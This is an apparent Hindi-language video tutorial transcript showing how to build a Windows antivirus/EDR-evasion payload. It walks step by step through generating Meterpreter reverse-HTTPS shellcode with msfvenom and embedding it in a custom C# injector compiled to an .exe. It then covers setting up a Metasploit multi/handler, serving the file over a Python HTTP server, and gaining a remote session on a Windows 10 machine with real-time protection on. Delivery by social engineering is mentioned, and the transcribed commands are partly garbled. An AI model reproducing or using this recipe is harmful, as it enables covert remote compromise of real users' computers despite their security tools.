विंडोज़ हैक एंड दी फायरवॉल इज़ बाईपास्ड। ये कंसेप्ट इन रियलिटी आपको बहुत ज़्यादा फ्रिक्शनल एंड ड्रीमिश लगता होगा, बट आज की इस वीडियो में आई एम गोइंग टू शो यू रियलिटी हाउ अटैकर्स बाईपास फायरवॉल्स EDR इवर्जन सिस्टम्स। एंड अगर आपको प्रैक्टिकल प्रूफ देखना है देन हियर इट इज़। आप यहाँ पे देख सकते हैं कि मेटास्प्लैट का जो सेशन है वो यहाँ पे ओपन है। मुझे अपनी विंडोज़ मशीन का यहाँ पे फुल एक्सेस मिल चुका है। जितने भी यहाँ पे सेशंस क्रिएट हुए हैं, जितने भी यहाँ पे सेशन चल रहे हैं, उन सब की इन्फॉर्मेशन मुझे यहाँ पे मिल रही है। जो मेरा डेस्कटॉप है, जो मेरी विक्टिम मशीन है, उसकी डिटेल्स मुझे यहाँ पे शो हो रही हैं। एंड सिस्टम के बारे में सारी इन्फॉर्मेशन, कौन सा कंप्यूटर में यूज़ कर रहा हूँ, कौन सा OS उसमें है, उसका आर्किटेक्चर कैसा है, सिस्टम की लैंग्वेज कौन सी है, हर एक इन्फॉर्मेशन मुझे यहाँ पे शो हो रही है। एंड PWD करके जो भी यहाँ पे वर्किंग डायरेक्टरी है जिसपे मैं हूँ, वो डायरेक्टरी भी यहाँ पे शो हो रही है कि लाइक यहाँ पे मैं डाउनलोड्स पे हूँ। मेरी विक्टिम मशीन में जितने भी प्रोसेसेस रन कर रहे हैं, उन सारी प्रोसेसेस की इन्फॉर्मेशन मुझे यहाँ पे शो हो रही है। एंड ये सब सिर्फ नॉर्मल प्रोसेसेस नहीं है, यहाँ पे ऑथराइज सिस्टम वाले प्रोसेसेस भी मुझे शो हो रहे हैं। एंड सिस्टम के अंदर किसी भी डिवाइस पे यहाँ पे मैं माइग्रेट कर सकता हूँ, किसी भी प्रोसेसेस के अंदर जितने भी यहाँ पे C ड्राइव के प्रोसेसेस हैं, उन सब की लिस्ट मुझे यहाँ पे शो हो रही है। यहाँ पे मैंने सिर्फ इनिशियल एक्सेस नहीं लिया है, फुल एक्सप्लोरेशन की है मैंने अपनी विंडोज़ मशीन की, अपनी विक्टिम मशीन की, सेम जैसे अटैकर्स एंड हैकर्स करते हैं। सो इस तरह से मेरी विक्टिम मशीन का जो फुल एक्सेस है वो मुझे यहाँ पे मिल चुका है मेरे एडवांस पेलोड के थ्रू। एंड जितनी भी उसकी नेटवर्किंग इन्फॉर्मेशन होती है, लाइक मैक एड्रेस, सबनेट मास्क, IP एड्रेस वर्जन 6, नेटवर्क राउट्स, ये सारी इन्फॉर्मेशन भी मैं यहाँ से एक्सेस कर सकता हूँ अपनी अटैकर मशीन से। सो लेट मी टेल यू कि मैंने इस एडवांस फायरवॉल इवर्जन पेलोड को कैसे बिल्ड किया। मैं यहाँ पे यूज़ कर रहा हूँ पैरेट OS, मेरी अटैकर मशीन। आप यहाँ पे सेम वे में काली लिनक्स भी यूज़ कर सकते हैं। टर्मिनल को यहाँ पे ओपन करेंगे एंड फर्स्ट ऑफ ऑल अपनी मशीन को अपडेट करेंगे, sudo apt अपडेट। नाउ यहाँ पे हम इंस्टॉल करेंगे मोनो टूल को क्रॉस कंप्लाइंस C हैश के लिए। उसके लिए सिंपली कमांड आएगी sudo apt इंस्टॉल मोनो mcs mono/complete/y। इस कमांड को एंटर करने के बाद हमारे सिस्टम में C कंप्लाइंस के लिए जो हमारा टूल है वो इंस्टॉल हो जाएगा, mcs//version। अपने टूल का हम यहाँ पे लेटेस्ट वर्जन देख लेंगे, मोनो C हैश कंप्लाइंस वर्जन 6.12.0। जो इसका लेटेस्ट वर्जन है वो हमारे सिस्टम में यहाँ पे इंस्टॉल हो गया है। नाउ यहाँ पे अटैकर्स एंड हैकर्स अपने सस्पिशियस गेम को स्टार्ट करते हैं एंड जनरेट करते हैं रॉ शेल कोड को। उसके लिए सिंपली कमांड आती है sudo msfvenom/p windows/metacreator reverse HTTPS के प्रोटोकॉल का हम यहाँ पे यूज़ कर रहे हैं /lhost। यहाँ पे हम डाल देंगे lhost में हमारी अटैकर मशीन का IP आएगा। उसके लिए हम यहाँ पे न्यू टर्मिनल को ओपन करेंगे, IP एडर शो ENS33। ये यहाँ पे मेरे नेटवर्क का इंटरफेस है एंड यहाँ पे ये मेरी अटैकर मशीन का IP एड्रेस है। इसे यहाँ से मैं कॉपी कर लूँगा। lhost को डालने के बाद अगेन स्लैश करेंगे एंड यहाँ पे lport हम एंटर करेंगे। lport यहाँ पे पोर्ट नंबर आएगा। हमने यहाँ पे HTTPS के प्रोटोकॉल का यूज़ किया है, सो दैट्स वाई हम यहाँ पे lport में यूज़ करेंगे 443 का। अगेन /f रॉ फॉर्मेट में हमारा ये पेलोड होगा। अगेन /o हमारे पेलोड का नाम, shellcode.bin। हम यहाँ पे .bin फाइल को क्रिएट कर रहे हैं ताकि बाद में हम इसके कोड में चेंजेस कर सकें। स्लैश करेंगे एंड यहाँ पे एग्जिट फंक्शन ऐड करेंगे, एग्जिट फंक्शन इक्वल टू थ्रेड एंड देन एंटर। तो यहाँ पे अटैकर्स की तरह हमने सेम वे में रॉ फॉर्मेट में जो हमारा शेल कोड है उसे हमने क्रिएट कर लिया। ls/la हमारे शेल कोड का नाम .bin। आप यहाँ पे देख सकते हैं हमारा जो शेल कोड है वो सक्सेसफुली क्रिएट हो चुका है। फाइल shellcode.bin इस कमांड का यूज़ करके हम अपने शेल कोड का जो आर्किटेक्चर है वो यहाँ पे देख सकते हैं कि हमने इसे विंडोज़ के लिए बनाया है एंड ये इंटेल का i306 आर्किटेक्चर यूज़ कर रहा है। नाउ ये तो एक सिंपल सा शेल स्क्रिप्ट है, बट अटैकर्स इसे एडवांस बनाने के लिए एंड अनडिटेक्टेबल बनाने के लिए यहाँ पे यूज़ करते हैं कस्टम C हैश इंजेक्टर का। सो लेट मी टेल यू कि उसे कैसे क्रिएट करना है। यहाँ पे कमांड आएगी sudo nano injector.cs। हम यहाँ पे C हैश लैंग्वेज का यूज़ कर रहे हैं, दैट्स वाई मैं यहाँ पे .cs फाइल यहाँ पे क्रिएट कर रहा हूँ। ये जो कस्टम C हैश इंजेक्टर स्क्रिप्ट है ये आपको डिस्क्रिप्शन में इसका लिंक मिल जाएगा एंड वहाँ से कॉपी करके आप इस स्क्रिप्ट को यहाँ पे पेस्ट कर सकते हो। Ctrl+X Y एंड देन एंटर। हमारी यहाँ पे जो फाइल है वो क्रिएट हो चुकी है। नाउ यहाँ पे मैं ls करूँगा एंड हमारे पास यहाँ पे दो फाइल्स रेडी हैं, एक हमारा शेल कोड एंड एक हमारी इंजेक्टर स्क्रिप्ट। इन दोनों फाइल्स को हम आपस में इंटीग्रेट करेंगे, आपस में एम्बेड करेंगे। उसके लिए यहाँ पे कमांड आएगी xdd/i हमारी फाइल का नाम shellcode.bin SED S/i
unsigned/4। आपको यहाँ पे वीडियो को पॉज करके इस पूरी कमांड को ध्यान से नोट डाउन करना है। ये कमांड बेसिकली जो हमारी दोनों फाइल्स हैं, इन दोनों फाइल्स को एम्बेड करेगी आपस में एंड एक न्यू फाइल को क्रिएट करेगी, shellcodearray.txt फाइल। एंटर करने के बाद जब हम यहाँ पे ls प्रेस करेंगे देन आप यहाँ पे देख सकते हैं एक न्यू फाइल यहाँ पे क्रिएट होगी, shellcodearray.txt फाइल। नाउ इस फाइल के अंदर यहाँ पे अरेज हैं, दैट्स वाई मैंने इसको shellcodearray.txt फाइल में क्रिएट किया। इन्हीं सभी अरेज को हम यहाँ पे बिट्स की फॉर्मेट में एक्सट्रैक्ट करेंगे। इसके लिए कमांड का यूज़ करेंगे कैट कमांड, shellcodearray.txt फाइल। इस कमांड को यहाँ पे आपको एंटर करना है एंड इस txt फाइल के अंदर जितने भी अरेज होंगे वो सारे हमें यहाँ पे बिट्स की फॉर्म में रिप्रेजेंट होंगे। सिंपली यहाँ पे हमें इन बिट्स को कॉपी करना है एंड injector.cs फाइल में पेस्ट करना है। बिट्स को कॉपी करने के बाद हमारी यहाँ पे कमांड आएगी sudo nano injector.cs एंड कोड में यहाँ पे आप देख सकते हैं पेस्ट शेल कोड बाइट्स हियर। मैंने यहाँ पे रिप्रेजेंट कर दिया है। सो यहाँ पे जो शेल कोड्स हैं हमें उन्हें पेस्ट करना है। तो इस तरह थाउजेंड्स ऑफ बिट्स को आपको यहाँ पे सेव करना है एंड मेक श्योर कि जो सारी बिट्स हैं वो यहाँ पे इस ब्रैकेट के अंदर आपको रिप्रेजेंट करनी है एंड यहाँ से Ctrl+X Y पे क्लिक करके एंटर प्रेस करना है एंड जो हमारी फाइल है वो सेव हो जाएगी। नाउ हमारी जो injector.cs फाइल है वो एडवांस लेवल पे फायरवॉल इवर्जन के लिए एकदम रेडी है। बट यहाँ पे .cs फाइल है, बट हमें इसे एग्जीक्यूटेबल बनाना होगा विंडोज़ के लिए। हमें इसे कन्वर्ट करना पड़ेगा .exe फॉर्मेट में ताकि विंडोज़ में ये रन हो सके, सेम जैसे अटैकर्स करते हैं। सो अटैकर्स एंड हैकर्स यहाँ पे .exe फाइल के कन्वर्जन के लिए MCS टूल का यूज़ करते हैं। दैट्स वाई हमने वीडियो की स्टार्टिंग में उसी टूल को इंस्टॉल किया था। अब हम यहाँ पे उसी टूल का यूज़ करके इस फाइल को .exe फाइल में कन्वर्ट करेंगे। MCS/target::exe फाइल /output injector.exe फाइल एंड हमारी ओरिजिनल फाइल का नाम injector.cs फाइल। आपको यहाँ पे इस कमांड को नोट डाउन करना है एंड इसे रन करना है। जब हम यहाँ पे अगेन ls करेंगे देन injector.exe फाइल, हमारी ये फाइल एकदम रेडी है एडवांस लेवल पे। इस फाइल के आर्किटेक्चर को भी हम यहाँ पे देख लेंगे। फाइल injector.exe फाइल, आप इसका आर्किटेक्चर देख सकते हैं कि यहाँ पे ये विंडोज़ के अकॉर्डिंग बनी हुई है एंड यहाँ पे जो इसका इंटेल प्रोसेस है वो कौन सा है। नाउ अटैकर्स ने यहाँ पे फाइल को एकदम रेडी कर लिया। अब यहाँ पे अटैकर्स यूज़ करते हैं मेटास्प्लोइटेबल हैंडलर्स का। उसके लिए सिंपली कमांड आएगी sudo msf console/q। यहाँ पे हम यूज़ करें मेटास्प्लोइटेबल फ्रेमवर्क का जो डेटाबेस वर्जन है उसका यूज़ करेंगे यहाँ पे exploit/multi/handler। आप यहाँ पे देख सकते हैं कि जो हमारा exploit multi/handler है वो यहाँ पे सिलेक्ट हो चुका है। अब हम सेट कर देंगे अपने पेलोड को जो हमने क्रिएट किया। सेट पेलोड Windows/x64 बिट मीटअपरेटर रिवर्स HTTPS। यहाँ पे आप देख सकते हैं कि जो हमारा पेलोड है वो यहाँ पे सिलेक्ट हो चुका है। सेट कर देंगे हम यहाँ पे L होस्ट को 192.168.159.128। L होस्ट में जो हमारा अटैकर मशीन का IP है जो हमने पेलोड क्रिएशन में यूज़ किया था उसी सेम IP का हम यहाँ पे यूज़ कर रहे हैं। अब यहाँ पे L पोर्ट को सेट करेंगे। सेट L पोर्ट। L पोर्ट में हमारा HTTPS का जो पोर्ट नंबर है वो आएगा 443। अब यहाँ पे हम सेट करेंगे एग्जिट ऑन सेशन। एग्जिट ऑन सेशन को फॉल्स में रखने से हमारा जो हैंडलर है, हमारा जो मेटास्प्लोइट का एक्सेस है वो रनिंग कंडीशन में रहेगा। इसे यहाँ पे हम एंटर करेंगे। नाउ एट द एंड हम यहाँ पे सेट करेंगे, हम यहाँ पे वर्बोस को ट्रू पे रख रहे हैं। ऐसा करने से यहाँ पे हमें डिटेल्ड कनेक्शन की इन्फॉर्मेशन मिलेगी। इसे हम यहाँ पे एंटर कर देंगे। नाउ हमारा जो हैंडलर है वो एकदम रेडी है। अब हम सिंपली अपने एक्सप्लॉइट को रन कर सकते हैं, बट उससे पहले हमें अपने .exe फाइल को विंडोज़ में भेजना पड़ेगा, विंडोज़ में ट्रांसफ़र करना पड़ेगा। यहीं पे अटैकर्स का फेवरेट डिलीवरी फेज़ आता है जहाँ पे अटैकर्स सोशल इंजीनियरिंग जैसी टेक्निक्स का यूज़ करते हैं। यहाँ पे न्यू टर्मिनल को ओपन करने के बाद हमें यहाँ पे पाइथन बेस्ड HTTP सर्वर यहाँ पे क्रिएट करेंगे। sudo python3/m http.server ऑन पोर्ट नंबर 8 एंटर। मेरा जो सर्वर है वो यहाँ पे एक्टिव हो चुका है। सो मैं यहाँ पे अपनी विक्टिम मशीन विंडोज़ 10 पे आ चुका हूँ एंड आप यहाँ पे इसकी सिक्योरिटी में देख सकते हैं कि जो इसकी रियल टाइम प्रोटेक्शन है वो यहाँ पे मैंने ऑन रखी है। नाउ सिंपली हम यहाँ पे ब्राउज़र पे जाएंगे एंड यहाँ पे हमें सर्च करना है हमारी अटैकर मशीन का IP एड्रेस। यहाँ पे हम इसे सर्च करेंगे एंड जितनी भी फाइल्स हैं वो सभी हमें यहाँ पे मिल जाएंगी। injector.exe फाइल, इस पर मैं क्लिक करूँगा एंड मेरी फाइल यहाँ पे डाउनलोड पे लग जाएगी। injector.exe फाइल, हमारी फाइल यहाँ पे सक्सेसफुली डिलीवर हो चुकी है, सक्सेसफुली ट्रांसफ़र हो चुकी है। अब हम अपने एक्सप्लॉइट को स्टार्ट कर सकते हैं। यहाँ पे मैं अपने एक्सप्लॉइट पे आ चुका हूँ, अपनी अटैकर मशीन पे आ चुका हूँ एंड यहाँ पे मुझे रन एंटर करना है। अगेन हम यहाँ पे विंडोज़ में आएंगे एंड जो हमारी इंजेक्टर फाइल है उसे हम यहाँ पे रन एज एडमिनिस्ट्रेटर करेंगे। यू कैन सी दैट हमारी जो .exe फाइल है वो यहाँ पे सक्सेसफुली रन हो चुकी है
एंड हमें यहाँ पे सारी एक्सप्लॉइट की चीज़ें मिल रही हैं। तो यहाँ पे आप देख सकते हैं कि जो हमारा EDR इवर्जन पेलोड है वो यहाँ पे इंजेक्ट हो चुका है सक्सेसफुल वे में, एंड जो हमारे मेटास्प्लॉइट के सेशन है वो यहाँ पे क्रिएट हो चुके हैं। इस तरह से अटैकर्स एंड हैकर्स एडवांस EVR इवर्जन पेलोड्स का यूज करते हैं सिक्योरिटी को बाईपास करने के लिए, ताकि आपके सिस्टम में वो सक्सेसफुली एक्सेस ले सके एंड सारी पोस्ट एक्सप्लॉइटेशन जैसी चीजें परफॉर्म कर सके। सो दैट्स ऑल अबाउट इट, एंड एट द एंड आई मस्ट से दैट कि अटैकर्स एंड हैकर्स बहुत ज्यादा एडवांस हो चुके हैं। सो दैट्स व्हाई आपको भी अपनी साइबर नॉलेज को एडवांसमेंट तक लेना पड़ेगा। एंड फॉर मोर कंटेंट लाइक दिस, डू सब्सक्राइब टू CWE।